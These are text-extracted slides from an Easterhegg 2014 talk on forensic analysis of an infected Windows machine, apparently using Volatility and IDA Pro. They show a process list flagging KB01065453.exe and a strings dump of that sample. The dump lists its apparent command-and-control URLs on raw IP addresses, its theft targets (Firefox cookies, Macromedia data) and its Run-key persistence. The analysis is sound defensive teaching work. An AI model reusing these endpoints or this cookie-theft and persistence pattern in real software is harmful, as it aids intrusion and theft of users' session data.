45 Offset(V) Name PID PPID Thds Hnds 0x819cca00 System 4 0 53 359 0x81843930 SMSS.EXE 324 4 3 19 0x8170dda0 CSRSS.EXE 608 324 10 435 0x8171c1c8 WINLOGON.EXE 632 324 17 504 0x8170ba98 SERVICES.EXE 676 632 15 258 0x81706a98 LSASS.EXE 688 632 24 369 0x8196e560 VBOXSERVICE.EXE 840 676 8 105 0x81793da0 SVCHOST.EXE 884 676 18 201 0x8170db20 SVCHOST.EXE 972 676 9 248 0x81823990 SVCHOST.EXE 1092 676 77 1492 0x81745c18 SVCHOST.EXE 1140 676 6 84 0x81703560 SVCHOST.EXE 1176 676 12 172 0x817d8730 EXPLORER.EXE 1548 1496 21 672 0x8183caf0 SPOOLSV.EXE 1664 676 10 117 0x81738da0 VBOXTRAY.EXE 1860 1548 10 939 0x81724470 CTFMON.EXE 1872 1548 4 94 0x816f0650 SVCHOST.EXE 584 676 4 105 0x817f4da0 ALG.EXE 460 676 6 106 0x819215d0 firefox.exe 3460 1548 36 462 0x817313c0 IEXPLORE.EXE 4008 1548 16 412 0x81706228 IEXPLORE.EXE 360 4008 29 994 0x81887620 KB01065453.exe 3564 1156 1 15
44.
xhr Easterhegg 2014
46 Process Dump
45.
xhr Easterhegg 2014
47
46.
xhr Easterhegg 2014
48 Putting it into IDA Pro * Having a Pro license totally rocks :) *
47.
xhr Easterhegg 2014
49 Detailz kthxbye! 000000011410 000000411410 0 http://113.130.65.77:8080/mx5/C/in/ 000000011458 000000411458 0 http://199.71.212.78:8080/mx5/C/in/ 0000000114A0 0000004114A0 0 http://211.191.168.98:8080/mx5/C/in/ 0000000114F0 0000004114F0 0 http://195.250.139.10:8080/mx5/C/in/ 000000011540 000000411540 0 http://173.224.208.60:8080/mx5/C/in/ 000000011590 000000411590 0 http://46.51.218.71:8080/mx5/C/in/ 0000000115D8 0000004115D8 0 http://89.97.55.33:8080/mx5/C/in/ 000000011620 000000411620 0 http://71.89.140.153:8080/mx5/C/in/ 000000011668 000000411668 0 http://195.111.72.46:8080/mx5/C/in/ 0000000116B0 0000004116B0 0 http://84.53.217.109:8080/mx5/C/in/ 0000000116F8 0000004116F8 0 http://78.46.64.17:8080/mx5/C/in/ 0000000111F8 0000004111F8 0 SoftwareMicrosoftWindows NTC%08X 000000011254 000000411254 0 MozillaFirefoxProfiles 000000011288 000000411288 0 cookies.* 00000001129C 00000041129C 0 Macromedia 0000000112BC 0000004112BC 0 firefox.exe 0000000112D4 0000004112D4 0 explorer.exe 000000011C60 000000411C60 0 SoftwareMicrosoftWindows NTS%08X 000000011CEB 000000411CEB 0 sKB%08d.exe 000000011D08 000000411D08 0 SoftwareMicrosoftWindowsCurrentVersionRun
48.
xhr Easterhegg 2014
50 Selected Tools
49.
xhr Easterhegg 2014
51 The Sleuth Kit http://www.sleuthkit.org
50.
xhr Easterhegg 2014
52 The Volatility Framework https://code.google.com/p/volatility/
51.
xhr Easterhegg 2014
53 Fin!
52.
xhr Easterhegg 2014
54 Q & A xhr xhr giessen.ccc.de @ @_xhr_
Jetzt herunterladen